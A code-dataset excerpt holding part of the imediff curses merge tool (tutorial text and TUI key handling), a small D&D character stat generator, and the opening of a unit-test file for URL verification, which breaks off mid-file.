This makes imediff the most stress-free tool. (I\nrealized this when I first used the original imediff2 program by Jarno\nElonen . Please note that the command name is changed from\nimediff2 to imediff now.)\n\nOther great tools for merge such as \"diff3 -m ...\" and \"git merge ...\"\noperate only on the difference by line. So even for the non-overlapping\nchanges, they yield the merge conflict if changes happen on the same line.\n\nThe automatic merge logic of the imediff command operates not only on the\ndifference by line but on the difference by character. This is another\ngreat feature of the imediff command. So for the non-overlapping changes, it\nalways yields the clean merge (mode \"g\").\n\nMerge with 2 files\n==================\n\nLet's try to merge 2 almost identical files, \"file_a\" and \"file_b\", into an\noutput file, \"file_o\". You can do this with the following.\n\n $ imediff -o file_o file_a file_b\n\nThis starts a full screen display of the content of the intended output\n\"file_o\". Initially all the different lines in \"file_a\" and \"file_b\" are\ngrouped in chunks and displayed in mode \"d\" which combines the corresponding\n\"file_a\" and \"file_b\" content by line.\n\nYou can move the focused chunk to the next chunk by pressing \"Space\", or \"n\"\nkeys. You can move the focused chunk to the previous chunk by pressing\n\"Back Space\", or \"p\" keys.\n\nYou can set the display mode of the focused chunk with the corresponding\nsingle key command. Pressing \"a\" displays the \"file_a\" content. Pressing\n\"b\" displays the \"file_b\" content.\n\nBy alternating \"a\" and \"b\" keys, you can see the difference in place which\nis easy on you with the constant line of sight. (This is the same great\nfeature inherited from the original imediff2 program.)\n\nYou can display both the \"file_a\" content and the \"file_b\" content with 2\nkey commands. Pressing \"d\" displays 2 blocks of lines organized somewhat\nlike \"diff -u\" (mode \"d\"). Pressing \"f\" displays intermixed 1 block of\nlines organized somewhat like \"wdiff\" (mode \"f\").\n\nPressing \"m\" starts an editor to edit the focused chunk from any modes to\ncreate a manually merged content. Upon exiting the editor, its result is\nkept in the editor result buffer. Even after pressing \"a\", \"b\", \"d\", or\n\"f\", the content of the editor result buffer can be recalled and displayed\nby pressing \"e\".\n\nPressing \"M\" in mode \"e\" removes the editor result buffer.\n\nWhen you press one of the upper case \"A\", \"B\", \"D\", \"E\", \"F\", this sets\nall chunks to the corresponding lower case mode.\n\nAll parts of imediff data normally need to select \"a\", \"b\", or \"e\" (excluding\n\"d\" and \"f\") before writing the merge result unless \"--sloppy\" is specified\nbefore writing the result. Type \"w\" or \"x\" to write the displayed content to\n\"file_o\" and exit the imediff program.\n\n{}\n\nAlthough the imediff program is practically WYSIWYG, there is one notable\nexception. For the deleted content in mode \"a\" or \"b\", the imediff program\ndisplays \"???\" in reverse mode as a placeholder. This \"???\" is not included\nin the output file.\n\nMerge with 3 files\n==================\n\nLet's try to merge 2 almost identical files, \"file_a\" and \"file_c\", both of\nwhich are based on the file, \"file_b\", into an output file, \"file_o\". You\ncan do this with the following.\n\n $ imediff -o file_o file_a file_b file_c\n\nThis starts a full screen display of the intended merged output content\n\"file_o\". Unlike \"Merge with 2 files\", the existence of the common base\nfile \"file_b\" allows the imediff program to chose desirable chunks\nautomatically from the corresponding \"file_a\" or \"file_c\" contents like\n\"diff3 -m\" or \"git merge\".\n\nActually, this imediff program does more. This imediff program merges not\nonly with comparison by the line like other tools but also comparison by the\ncharacter. This allows the clean automatic merge even when changes happen\non different positions of the same line of \"file_a\" and \"file_c\" derived\nfrom \"file_b\".\n\nOnly really unresolved chunks are displayed in mode \"d\". You can move the\nfocused chunk to the next unresolved chunk by pressing \"Tab\", or \"N\" keys.\nPressing \"m\" starts an editor to create a manually merged content. You can\nmove the focused chunk to the previous unresolved chunk by pressing\n\"Shift-Tab\", or \"P\" keys.\n\nThe key binding for \"Merge with 3 files\" is almost the same as that for\n\"Merge with 2 files\". There are 2 notable extensions. Pressing \"c\"\ndisplays the \"file_c\" content. Pressing \"g\" causes automatic merge efforts\non a chunk for 3 files in the following order:\n * If the editor result buffer has content, mode is set to \"e\".\n * If a chunk is resolved cleanly, mode is set to \"a\", \"c\", or \"g\".\n This overrides previous manual settings such as \"a\", \"b\", or \"c\".\n * If a chunk isn't resolved cleanly, mode is left as mode \"d\" or \"f\".\n\nBy alternating \"a\" and \"c\" keys, you can see the difference in place.\n\nAll parts of imediff data normally need to select \"a\", \"b\", \"c\", \"g\" or \"e\"\n(excluding \"d\" and \"f\") before writing the merge result unless \"--sloppy\" is\nspecified before writing the result.\n\nThe rests are mostly the same as \"Merge with 2 files\".\n\nTerminal\n========\n\nThe imediff program is compatible with any terminal window sizes. It\nsupports both monochrome and color terminals. For comfortable user\nexperience, terminal width of 80 characters/line or more and terminal height\nof 24 lines or more are desirable.\n\nWhen mode column is enabled by \"-m\" option or monochrome terminal is used,\nthe first column is used to indicate the match type of each un-selectable\nmatched section or display mode of each selectable unmatched chunk.\n * \"=\" for a un-selectable section means unchanged source files: a==b==c.\n (Under the color terminal, this is displayed in white/normal.)\n * \"#\" for a un-selectable section means matched and changed files: a==c and\n a!=b. (Under the color terminal, this is displayed in white/bold.)\n * \"a\", \"b\", \"c\", \"d\", \"e\", \"f\", and \"g\" for selectable unmatched chunk are\n the display mode of each chunk. (Under the color terminal, these are\n displayed in different colors.)\n\nCustomization\n=============\n\nThe imediff program can customize its key binding and its color setting with\nthe \"~/.imediff\" file in the ini file format. You can create its template\nfile by the \"imediff -t\" command.\n\nYou can disable an existing \"~/.imediff\" file without renaming it by\nspecifying a non-existing file, e.g., \"BOGUS\" as \"imediff -C BOGUS ...\".\nThe internal default values of the imediff program are used.\n\nNote\n====\n\nSome keys are aliased for \"Merge with 2 files\" for your convenience:\n * \"c\" works as \"d\"\n * \"g\" works as \"e\"\n\nThe \"diff3 -m\" has an odd feature for the merge when \"file_a\" and \"file_c\"\nundergo identical changes from \"file_b\". This imediff program results in a\nmore intuitive merge result.\"\"\".format(\n nonclean\n)\n\n\nclass TextPad(TextData): # TUI data\n \"\"\"Curses class to handle diff data for 2 or 3 lines\"\"\"\n\n # persistent variables: self.*\n # stdscr: display object\n # winh, winw: Window height and width from stdscr.getmaxyx()\n # conth, contw: Content height and width of textpad\n # row, col: window top left position in textpad\n # active: index for self.actives\n # non-persistent running variables\n # i: index as self.opcodes[i]\n # j: index as self.actives[j]\n def __init__(self, list_a, list_b, list_c, args, confs):\n # Init from super class \"TextData\"\n super().__init__(list_a, list_b, list_c, args, confs)\n # Init from commandline/configuration parameters\n self.mode = args.mode\n self.mono = args.mono\n if self.diff_mode == 2:\n self.color = confs[\"color_diff2\"]\n else:\n self.color = confs[\"color_diff3\"]\n return\n\n def command_loop(self, tutorial=False): # for curses TUI (wrapper)\n self.tutorial = tutorial\n curses.wrapper(self.gui_loop)\n return\n\n def gui_loop(self, stdscr): # for curses TUI (core)\n # initialize\n self.stdscr = stdscr\n color = self.color # shorthand\n self.winh, self.winw = self.stdscr.getmaxyx() # window size\n curses.start_color()\n self.stdscr.clear()\n self.stdscr.refresh()\n # set color pair_number as (pair_number, fg, bg)\n curses.init_pair(1, cc[color[\"color_a\"]], cc[\"BLACK\"])\n curses.init_pair(2, cc[color[\"color_b\"]], cc[\"BLACK\"])\n curses.init_pair(3, cc[color[\"color_c\"]], cc[\"BLACK\"])\n curses.init_pair(4, cc[color[\"color_d\"]], cc[\"BLACK\"])\n curses.init_pair(5, cc[color[\"color_e\"]], cc[\"BLACK\"])\n curses.init_pair(6, cc[color[\"color_f\"]], cc[\"BLACK\"])\n #\n # +6: active cc\n self.active_color = 6\n curses.init_pair(7, cc[\"WHITE\"], cc[color[\"color_a\"]])\n curses.init_pair(8, cc[\"WHITE\"], cc[color[\"color_b\"]])\n curses.init_pair(9, cc[\"WHITE\"], cc[color[\"color_c\"]])\n curses.init_pair(10, cc[\"WHITE\"], cc[color[\"color_d\"]])\n curses.init_pair(11, cc[\"WHITE\"], cc[color[\"color_e\"]])\n curses.init_pair(12, cc[\"WHITE\"], cc[color[\"color_f\"]])\n #\n # +12: deleted cc\n self.deleted_color = 12\n curses.init_pair(13, cc[color[\"color_a\"]], cc[\"WHITE\"])\n curses.init_pair(14, cc[color[\"color_b\"]], cc[\"WHITE\"])\n curses.init_pair(15, cc[color[\"color_c\"]], cc[\"WHITE\"])\n curses.init_pair(16, cc[color[\"color_d\"]], cc[\"WHITE\"])\n curses.init_pair(17, cc[color[\"color_e\"]], cc[\"WHITE\"])\n curses.init_pair(18, cc[color[\"color_f\"]], cc[\"WHITE\"])\n #\n # +6+12\n curses.init_pair(19, cc[\"BLACK\"], cc[color[\"color_a\"]])\n curses.init_pair(20, cc[\"BLACK\"], cc[color[\"color_b\"]])\n curses.init_pair(21, cc[\"BLACK\"], cc[color[\"color_c\"]])\n curses.init_pair(22, cc[\"BLACK\"], cc[color[\"color_d\"]])\n curses.init_pair(23, cc[\"BLACK\"], cc[color[\"color_e\"]])\n curses.init_pair(24, cc[\"BLACK\"], cc[color[\"color_f\"]])\n #\n if curses.has_colors() == False:\n self.mono = True\n if self.mono:\n self.mode = True\n self.color_a = \"WHITE\"\n self.color_b = \"WHITE\"\n self.color_c = \"WHITE\"\n self.color_d = \"WHITE\"\n self.color_e = \"WHITE\"\n self.color_f = \"WHITE\"\n else:\n if self.diff_mode == 2:\n self.color_a = color[\"color_a\"]\n self.color_b = color[\"color_b\"]\n # self.color_c = color['color_c'] # never used\n self.color_d = color[\"color_d\"]\n self.color_e = color[\"color_e\"]\n self.color_f = color[\"color_f\"]\n else:\n self.color_a = color[\"color_a\"]\n self.color_b = color[\"color_b\"]\n self.color_c = color[\"color_c\"]\n self.color_d = color[\"color_d\"]\n self.color_e = color[\"color_e\"]\n self.color_f = color[\"color_f\"]\n # display parameters\n self.col = 0 # the column coordinate of textpad (left most=0)\n self.row = 0 # the row coordinate of textpad (top most=0)\n self.update_textpad = True # update textpad content\n while True:\n if self.active is not None:\n logger.debug(\n \"command loop: active = {} active_index = {} row = {} col = {}\".format(\n self.active, self.actives[self.active], self.row, self.col\n )\n )\n else:\n logger.debug(\n \"command loop: active = ***None*** row = {} col = {}\".format(\n self.row, self.col\n )\n )\n curses.curs_set(0)\n if self.update_textpad:\n self.new_textpad()\n # clear to remove garbage outside of textpad\n self.winh, self.winw = self.stdscr.getmaxyx()\n self.adjust_window()\n for icol in range(self.contw - self.col, self.winw):\n self.stdscr.vline(0, icol, \" \", self.winh)\n ##self.stdscr.vline(0, self.contw - self.col, '@', self.winh)\n ##self.stdscr.vline(0, self.winw-1, '*', self.winh)\n # clear rows downward to remove garbage characters\n for irow in range(self.conth - self.row, self.winh):\n self.stdscr.hline(irow, 0, \" \", self.winw)\n ##if (self.conth - self.row) <= self.winh -1 and (self.conth - self.row) >= 0:\n ## self.stdscr.hline(self.conth - self.row , 0, '@', self.winw)\n if self.update_textpad or self.update_active:\n self.highlight()\n self.textpad.refresh(self.row, self.col, 0, 0, self.winh - 1, self.winw - 1)\n if self.active is not None:\n row = self.get_row(self.actives[self.active]) - self.row\n if row >= 0 and row < self.winh:\n self.stdscr.move(row, 0)\n curses.curs_set(1)\n else:\n curses.curs_set(0)\n self.stdscr.refresh()\n # reset flags\n self.update_textpad = False\n self.update_active = False\n if self.tutorial:\n c = ord(\"H\")\n self.tutorial = False\n else:\n c = self.getch_translated()\n ch = chr(c)\n if ch == \"w\" or ch == \"x\" or c == curses.KEY_EXIT or c == curses.KEY_SAVE:\n if self.sloppy or (\n not self.sloppy and self.get_unresolved_count() == 0\n ):\n if not self.confirm_exit or self.popup(\n _(\"Do you 'save and exit'? (Press '{y:c}' to exit)\").format(\n y=self.rkc[\"y\"]\n )\n ):\n output = self.get_output()\n write_file(self.file_o, output)\n break\n else:\n self.popup(\n _(\n \"Can't 'save and exit' due to the non-clean merge. (Press '{y:c}' to continue)\"\n + \"\\n\\n\"\n + _nonclean\n ).format(y=self.rkc[\"y\"])\n )\n elif ch == \"q\":\n if not self.confirm_exit or self.popup(\n _(\"Do you 'quit without saving'? (Press '{y:c}' to quit)\").format(\n y=self.rkc[\"y\"]\n )\n ):\n self.opcodes = []\n error_exit(\"Quit without saving by the user request\\n\")\n elif ch == \"h\" or c == curses.KEY_HELP:\n # Show help screen\n self.popup(self.helptext())\n elif ch == \"H\":\n # Show tutorial screen\n self.popup(_tutorial)\n elif ch == \"s\" or ch == \"?\":\n # Show location\n if len(self.actives) == 0:\n self.popup(\n _stattext0.format(row=self.row, conth=self.conth, col=self.col)\n )\n else:\n self.popup(\n _stattext1.format(\n active=self.active,\n total=len(self.actives),\n unresolved=self.get_unresolved_count(),\n row=self.row,\n conth=self.conth,\n col=self.col,\n )\n )\n # Moves in document\n elif c == curses.KEY_SR or c == curses.KEY_UP or ch == \"k\":\n self.row -= 1\n elif c == curses.KEY_SF or c == curses.KEY_DOWN or ch == \"j\":\n self.row += 1\n elif c == curses.KEY_LEFT:\n self.col -= 8\n elif c == curses.KEY_RIGHT:\n self.col += 8\n elif c == curses.KEY_PPAGE:\n self.row -= self.winh\n elif c == curses.KEY_NPAGE:\n self.row += self.winh\n # Terminal resize signal\n elif c == curses.KEY_RESIZE:\n self.winh, self.winw = self.stdscr.getmaxyx()\n else:\n pass\n # Following key-command updates TextPad\n if self.active is not None:\n # get active chunk\n # Explicitly select chunk mode\n if ch in \"abdef\":\n self.set_mode(self.actives[self.active], ch)\n elif ch in \"12456\":\n self.set_mode(\n self.actives[self.active], chr(ord(ch) - ord(\"1\") + ord(\"a\"))\n )\n elif ch in \"ABDEF\":\n self.set_all_mode(ch.lower())\n elif ch in \"cg\" and self.diff_mode == 3:\n self.set_mode(self.actives[self.active], ch)\n elif ch in \"37\" and self.diff_mode == 3:\n self.set_mode(\n self.actives[self.active], chr(ord(ch) - ord(\"1\") + ord(\"a\"))\n )\n elif ch in \"CG\" and self.diff_mode == 3:\n self.set_all_mode(ch.lower())\n elif c == 10 or c == curses.KEY_COMMAND:\n mode = self.get_mode(self.actives[self.active])\n if mode == \"a\":\n self.set_mode(self.actives[self.active], \"b\")\n elif mode == \"b\" and self.diff_mode == 2:\n self.set_mode(self.actives[self.active], \"d\")\n elif mode == \"b\" and self.diff_mode == 3:\n self.set_mode(self.actives[self.active], \"c\")\n elif mode == \"c\":\n self.set_mode(self.actives[self.active], \"d\")\n elif (\n mode == \"d\"\n and self.get_bf(self.actives[self.active]) is not None\n ):\n self.set_mode(self.actives[self.active], \"e\")\n elif mode == \"d\":\n self.set_mode(self.actives[self.active], \"f\")\n elif mode == \"e\":\n self.set_mode(self.actives[self.active], \"f\")\n else: # f\n self.set_mode(self.actives[self.active], \"a\")\n elif ch == \"m\":\n self.editor(self.actives[self.active])\n elif ch == \"M\" and mode == \"e\":\n self.del_editor(self.actives[self.active])\n elif ch == \"n\" or c == curses.KEY_NEXT or ch == \" \":\n self.active_next()\n elif ch == \"p\" or c == curses.KEY_PREVIOUS or c == curses.KEY_BACKSPACE:\n self.active_prev()\n elif ch == \"t\" or c == curses.KEY_HOME:\n self.active_home()\n elif ch == \"z\" or c == curses.KEY_END:\n self.active_end()\n elif ch == \"N\" or ch == \"\\t\":\n self.diff_next()\n elif ch == \"P\" or c == curses.KEY_BTAB:\n self.diff_prev()\n elif ch == \"T\":\n self.diff_home()\n elif ch == \"Z\":\n self.diff_end()\n else:\n pass\n logger.debug(\"command-loop\")\n return\n\n def new_textpad(self):\n \"\"\"Create new curses textpad\"\"\"\n # pre-scan content to get big enough textpad size\n conth = 0 # content height\n contw = 0 # content width\n for i in range(len(self.opcodes)):\n self.set_row(i, conth) # record textpad row position in chunk\n tag = self.get_tag(i)\n content = self.get_content(i) # list()\n conth += len(content)\n if tag == \"E\" or tag == \"e\":\n pass\n else:\n if len(content) == 0:\n conth += 1\n for line in content:\n contw = max(contw, console_width(line))\n if self.mode: # Add mode column\n contw += 2 # for the tag indicator + ' '\n self.conth = conth\n self.contw = contw\n # actual textpad size slightly bigger for safety margin\n self.textpad = curses.newpad(conth + 1, max(80, contw + 1))\n for i in range(len(self.opcodes)):\n self.textpad_addstr(i, False)\n if self.active is not None:\n logger.debug(\n \"gui init: active={} chunk_index={} row={} col={} conth={} contw={}\".format(\n self.active,\n self.actives[self.active],\n self.row,\n self.col,\n self.conth,\n self.contw,\n )\n )\n return\n\n def textpad_addstr(self, i, selected=False):\n tag = self.get_tag(i)\n mode = self.get_mode(i)\n if tag == \"E\": # Same a = b = c\n decor = curses.A_DIM\n color_pair = 0\n prefix = \"= \"\n elif tag == \"e\": # Same a = c\n decor = curses.A_BOLD\n color_pair = 0\n prefix = \"# \"\n elif mode == \"a\": # diff2 OLD /diff3: YOURS NEW\n decor = curses.A_BOLD\n color_pair = 1\n prefix = mode + \" \"\n elif mode == \"b\": # diff2 NEW /diff3: common OLD\n decor = curses.A_BOLD\n color_pair = 2\n prefix = mode + \" \"\n elif mode == \"c\": # diff2 --- /diff3: THEIRS NEW\n decor = curses.A_BOLD\n color_pair = 3\n prefix = mode + \" \"\n elif mode == \"d\": # diff\n decor = curses.A_BOLD\n color_pair = 4\n prefix = mode + \" \"\n elif mode == \"e\": # edit buffer\n decor = curses.A_BOLD\n color_pair = 5\n prefix = mode + \" \"\n elif mode == \"f\": # wdiff\n decor = curses.A_BOLD\n color_pair = 6\n prefix = mode + \" \"\n else: # 'g': # wdiff, cleanly merged\n decor = curses.A_BOLD\n decor |= curses.A_REVERSE\n color_pair = 6\n prefix = mode + \" \"\n row = self.get_row(i)\n content = self.get_content(i) # list()\n # Decorative \"???\" for deleted lines only for display\n if len(content) == 0 and tag not in \"Ee\":\n content = [\"???\"] # override []\n if self.mono:\n decor |= curses.A_REVERSE\n else:\n color_pair += self.deleted_color\n if selected:\n color_pair += self.active_color\n decor |= curses.A_REVERSE\n for line in content:\n # logger.debug(\"textpad.addstr, >>> row={} line={} decor={} color_pair={}\".format(row, line[:-1], decor , color_pair))\n if self.mono:\n self.textpad.addstr(row, 0, prefix + line, decor)\n elif self.mode:\n self.textpad.addstr(\n row, 0, prefix + line, decor | curses.color_pair(color_pair)\n )\n else:\n self.textpad.addstr(row, 0, line, decor | curses.color_pair(color_pair))\n row += 1\n return\n\n def adjust_window(self):\n \"\"\"Clamp window scope to have cursor within window and content\"\"\"\n # row, col -> index: first column/line = 0\n # winh, winw -> number: first column/line = 1\n # conth, contw -> number: first column/line = 1\n context_length = 10\n self.winh, self.winw = self.stdscr.getmaxyx()\n if self.update_active and self.active is not None:\n selected_row = self.get_row(self.actives[self.active])\n if self.row >= selected_row - context_length:\n self.row = selected_row - context_length\n if self.row <= selected_row - self.winh + context_length:\n self.row = selected_row - self.winh + context_length\n # clamp cursor col/row within data\n if self.row >= self.conth - self.winh:\n self.row = self.conth - self.winh\n if self.row < 0:\n self.row = 0\n if self.col >= self.contw - 1:\n self.col = self.contw - 1\n if self.col < 0:\n self.col = 0\n logger.debug(\n \"adjust_window: conth={} contw={} winh={} winw={} row={}, col={}\".format(\n self.conth, self.contw, self.winh, self.winw, self.row, self.col\n )\n )\n return\n\n def highlight(self):\n \"\"\"Update textpad by repainting active highlight\"\"\"\n if self.active is None:\n # No diff --> No highlight action\n # Avoid out of range for self.active, self.active_old\n # This makes highlight more robust and easy to use\n pass\n else:\n if self.active != self.active_old and self.active_old is not None:\n # Repaint old selection without highlighting\n self.textpad_addstr(self.actives[self.active_old], selected=False)\n self.textpad_addstr(self.actives[self.active], selected=True)\n return\n\n def set_mode(self, i, new_mode):\n super().set_mode(i, new_mode)\n self.update_textpad = True\n return\n\n def getch_translated(self):\n \"\"\"Macro parsing instead of curses getch\"\"\"\n if len(self.macro):\n c = ord(self.macro[:1])\n c = self.c_translated(c)\n if c == ord(\":\"):\n try:\n c = self.stdscr.getch()\n except:\n c = ord(\"q\") # quit w/o saving for ^C\n c = self.c_translated(c)\n else:\n self.macro = self.macro[1:]\n else:\n c = 0 # End of MACRO\n return c\n\n def popup(self, text):\n self.winh, self.winw = self.stdscr.getmaxyx()\n popupw = 0\n popuph = 0\n for line in text.split(\"\\n\"):\n popupw = max(popupw, console_width(line))\n popuph += 1\n popuph = popuph + 2 # top/bottom border\n popupw = popupw + 4 # left/right (border + space)\n popuppad = curses.newpad(popuph, popupw)\n for i, line in enumerate(text.split(\"\\n\")):\n popuppad.addstr(1 + i, 2, line, curses.A_BOLD)\n popuppad.border()\n poprow = 0\n popcol = 0\n curses.curs_set(0)\n while True:\n self.winh, self.winw = self.stdscr.getmaxyx()\n popwinh = min(popuph, self.winh)\n popwinw = min(popupw, self.winw)\n self.textpad.refresh(self.row, self.col, 0, 0, self.winh - 1, self.winw - 1)\n # logger.debug(\"popup before >>> poprow={} popcol={} popupw={} popwinw={}\".format(poprow, popcol, popupw, popwinw))\n if poprow <= 0:\n poprow = 0\n if poprow >= popuph - popwinh:\n poprow = popuph - popwinh\n if popcol <= 0:\n popcol = 0\n if popcol >= popupw - popwinw:\n popcol = popupw - popwinw\n popuppad.refresh(\n poprow,\n popcol,\n max((self.winh - popwinh) // 2, 0),\n max((self.winw - popwinw) // 2, 0),\n min((self.winh + popwinh + 1) // 2 - 1, self.winh - 1),\n min((self.winw + popwinw + 1) // 2 - 1, self.winw - 1),\n )\n self.stdscr.refresh()\n c = self.getch_translated()\n ch = chr(c)\n # Moves in document\n if c == curses.KEY_SR or c == curses.KEY_UP or ch == \"k\":\n poprow -= 1\n elif c == curses.KEY_SF or c == curses.KEY_DOWN or ch == \"j\":\n poprow += 1\n elif c == curses.KEY_LEFT:\n popcol -= 1\n elif c == curses.KEY_RIGHT:\n popcol += 1\n elif c == curses.KEY_PPAGE:\n poprow -= popwinh\n elif c == curses.KEY_NPAGE:\n poprow += popwinh\n # Terminal resize signal\n elif c == curses.KEY_RESIZE:\n self.winh, self.winw = self.stdscr.getmaxyx()\n elif c == ord(\"y\") or c == ord(\"y\") - 32:\n result = True\n break\n else:\n result = False\n break\n self.stdscr.refresh()\n return result\n\n def editor(self, i):\n # logger.debug(\"Before invoking editor\")\n self.stdscr.keypad(0)\n curses.savetty()\n curses.echo()\n curses.nocbreak()\n curses.endwin()\n super().editor(i)\n curses.cbreak()\n curses.noecho()\n curses.resetty()\n self.stdscr.keypad(True) # keys processed by curses (again)\n self.stdscr.clear()\n self.stdscr.refresh()\n # logger.debug(\"After invoking editor\")\n return\n\n def helptext(self):\n if self.diff_mode == 2:\n text = _helptext2.format(\n file_a=self.file_a,\n color_a=self.color_a,\n file_b=self.file_b,\n color_b=self.color_b,\n color_d=self.color_d,\n color_e=self.color_e,\n color_f=self.color_f,\n w=self.rkc[\"w\"],\n x=self.rkc[\"x\"],\n q=self.rkc[\"q\"],\n a=self.rkc[\"a\"],\n b=self.rkc[\"b\"],\n d=self.rkc[\"d\"],\n e=self.rkc[\"e\"],\n f=self.rkc[\"f\"],\n A=self.rkc[\"a\"] - 32,\n B=self.rkc[\"b\"] - 32,\n D=self.rkc[\"d\"] - 32,\n E=self.rkc[\"e\"] - 32,\n F=self.rkc[\"f\"] - 32,\n m=self.rkc[\"m\"],\n edit_cmd=self.edit_cmd,\n M=self.rkc[\"m\"] - 32,\n j=self.rkc[\"j\"],\n k=self.rkc[\"k\"],\n n=self.rkc[\"n\"],\n p=self.rkc[\"p\"],\n N=self.rkc[\"n\"] - 32,\n P=self.rkc[\"p\"] - 32,\n t=self.rkc[\"t\"],\n z=self.rkc[\"z\"],\n T=self.rkc[\"t\"] - 32,\n Z=self.rkc[\"z\"] - 32,\n s=self.rkc[\"s\"],\n h=self.rkc[\"h\"],\n H=self.rkc[\"h\"] - 32,\n )\n else:\n text = _helptext3.format(\n file_a=self.file_a,\n color_a=self.color_a,\n file_b=self.file_b,\n color_b=self.color_b,\n file_c=self.file_c,\n color_c=self.color_c,\n color_d=self.color_d,\n color_e=self.color_e,\n color_f=self.color_f,\n w=self.rkc[\"w\"],\n x=self.rkc[\"x\"],\n q=self.rkc[\"q\"],\n a=self.rkc[\"a\"],\n b=self.rkc[\"b\"],\n c=self.rkc[\"c\"],\n d=self.rkc[\"d\"],\n e=self.rkc[\"e\"],\n f=self.rkc[\"f\"],\n g=self.rkc[\"g\"],\n A=self.rkc[\"a\"] - 32,\n B=self.rkc[\"b\"] - 32,\n C=self.rkc[\"c\"] - 32,\n D=self.rkc[\"d\"] - 32,\n E=self.rkc[\"e\"] - 32,\n F=self.rkc[\"f\"] - 32,\n G=self.rkc[\"g\"] - 32,\n m=self.rkc[\"m\"],\n edit_cmd=self.edit_cmd,\n M=self.rkc[\"m\"] - 32,\n j=self.rkc[\"j\"],\n k=self.rkc[\"k\"],\n n=self.rkc[\"n\"],\n p=self.rkc[\"p\"],\n N=self.rkc[\"n\"] - 32,\n P=self.rkc[\"p\"] - 32,\n t=self.rkc[\"t\"],\n z=self.rkc[\"z\"],\n T=self.rkc[\"t\"] - 32,\n Z=self.rkc[\"z\"] - 32,\n s=self.rkc[\"s\"],\n h=self.rkc[\"h\"],\n H=self.rkc[\"h\"] - 32,\n )\n return text\n","repo_name":"osamuaoki/imediff","sub_path":"src/imediff/tui.py","file_name":"tui.py","file_ext":"py","file_size_in_byte":37260,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"32"} +{"seq_id":"74058716890","text":"import random\nfrom racegen import race\n\ndef dice():\n\tx=random.randint(1, 6)\n\ty=random.randint(1, 6)\n\tz=random.randint(1, 6)\n\to=random.randint(1, 6)\n\tstat=[x, y, z, o]\n\tstat.remove(min(stat))\n\tr=sum(stat)\n\treturn r\n\nstre=dice()\nagi=dice()\nstam=dice()\nintel=dice()\nmudr=dice()\nhar=dice()\n\nstats_work=[\nstre,\nagi,\nstam,\nintel,\nmudr,\nhar\n]\n\ndef rand_stat():\n x=int()\n y=int()\n x=random.randint(0, 5)\n y=random.randint(0, 5)\n stats_work[x]+=1\n stats_work[y]+=1\n \nif race=='Лесной гном':\n\tagi+=1\n\tintel+=2\nelif race=='Скальный гном':\n\tstam+=1\n\tintel+=2\nelif race=='Горный дварф':\n\tstam+=2\n\tstre+=2\nelif race=='Холмовой дварф':\n\tstam+=2\n\tmudr+=1\nelif race=='Драконорожденный':\n\tstre+=2\n\thar+=1\nelif race=='Полуорк':\n\tstam+=1\n\tstre+=2\nelif race=='Коренастый полурослик':\n\tagi+=2\n\tstam+=1\nelif race=='Легконогий полурослик':\n\tagi+=2\n\thar+=1\nelif race=='Полуэльф':\n\trand_stat()\nelif race=='Тифлинг':\n\tintel+=1\n\thar+=1\nelif race=='Человек':\n\tstre+=1\n\tagi+=1\n\tstam+=1\n\tintel+=1\n\tmudr+=1\n\thar+=1\nelif race=='Высший эльф':\n\tagi+=2\n\tintel+=1\nelif race=='Лесной эльф':\n\tagi+=2\n\tmudr+=1\nelif race=='Темный эльф':\n\tagi+=2\n\thar+=1\n\n\nstats=(\n\"Сила:\"+str(stre)+\"\\n\",\n\"Ловкость:\"+str(agi)+\"\\n\",\n\"Телосложение:\"+str(stam)+\"\\n\",\n\"Интелект:\"+str(intel)+\"\\n\",\n\"Мудрость:\"+str(mudr)+\"\\n\",\n\"Харизма:\"+str(har)+\"\\n\"\n)\n\n\n\n","repo_name":"SatanSVS/DnD_char_gen_bot","sub_path":"statsgen.py","file_name":"statsgen.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19163633229","text":"\"\"\" Test the verification code \"\"\"\n# pylint: disable=protected-access\nimport argparse\nimport io\nimport logging\nimport ftplib\nimport os\nimport os.path\nimport socket\nimport textwrap\nimport unittest\nimport unittest.mock as mock\n\nimport requests.auth\nimport requests.exceptions\nimport requests_oauthlib\n\nimport geospaas_harvesting.verify_urls as verify_urls\n\n\nclass ProviderTestCase(unittest.TestCase):\n \"\"\"Test the Provider base class\"\"\"\n\n def test_instantiation(self):\n \"\"\"Test the setting of the base properties\"\"\"\n name = 'test'\n config = {'foo': 'bar', 'baz': 'qux'}\n provider = verify_urls.Provider(name, config)\n self.assertEqual(provider.name, name)\n self.assertEqual(provider.config, config)\n self.assertIsNone(provider._auth)\n\n def test_equality(self):\n \"\"\"Test the equlity operator between two Provider objects\"\"\"\n self.assertEqual(\n verify_urls.Provider('test', {'foo': 'bar'}),\n verify_urls.Provider('test', {'foo': 'bar'}))\n self.assertNotEqual(\n verify_urls.Provider('test', {'foo': 'bar'}),\n verify_urls.Provider('test2', {'foo': 'bar'}))\n self.assertNotEqual(\n verify_urls.Provider('test', {'foo': 'bar'}),\n verify_urls.Provider('test', {'baz': 'qux'}))\n\n def test_abstract_auth(self):\n \"\"\"The auth property should raise a NotImplementedError\"\"\"\n with self.assertRaises(NotImplementedError):\n verify_urls.Provider('test', {}).auth\n\n def test_abstract_check_url(self):\n \"\"\"The check_url() method should raise a NotImplementedError\"\"\"\n with self.assertRaises(NotImplementedError):\n verify_urls.Provider('test', {}).check_url(mock.Mock())\n\n def test_abstract_check_all_urls(self):\n \"\"\"The check_all_urls() method should raise a NotImplementedError\"\"\"\n with self.assertRaises(NotImplementedError):\n verify_urls.Provider('test', {}).check_all_urls('file')\n\n def test_write_stale_url(self):\n \"\"\"Test writing URL checking information to a file\"\"\"\n with mock.patch('geospaas_harvesting.verify_urls.open') as mock_open:\n mock_file = mock.MagicMock()\n mock_open.return_value.__enter__.return_value = mock_file\n with self.assertLogs(verify_urls.logger, level=logging.DEBUG):\n verify_urls.Provider('test', {}).write_stale_url(\n 'file_name',\n 'absent',\n 518,\n 'http://foo/bar.nc')\n mock_file.write.assert_called_once_with(f\"absent 518 http://foo/bar.nc{os.linesep}\")\n\n\nclass HTTPProviderTestCase(unittest.TestCase):\n \"\"\"Test the HTTPProvider class\"\"\"\n\n def test_instantiation(self):\n \"\"\"Test that the attributes are correctly initialized\"\"\"\n provider = verify_urls.HTTPProvider('test', {'foo': 'bar'})\n self.assertEqual(provider.name, 'test')\n self.assertEqual(provider.config, {'foo': 'bar'})\n self.assertEqual(provider._auth_start, None)\n\n def test_build_oauth2(self):\n \"\"\"Should 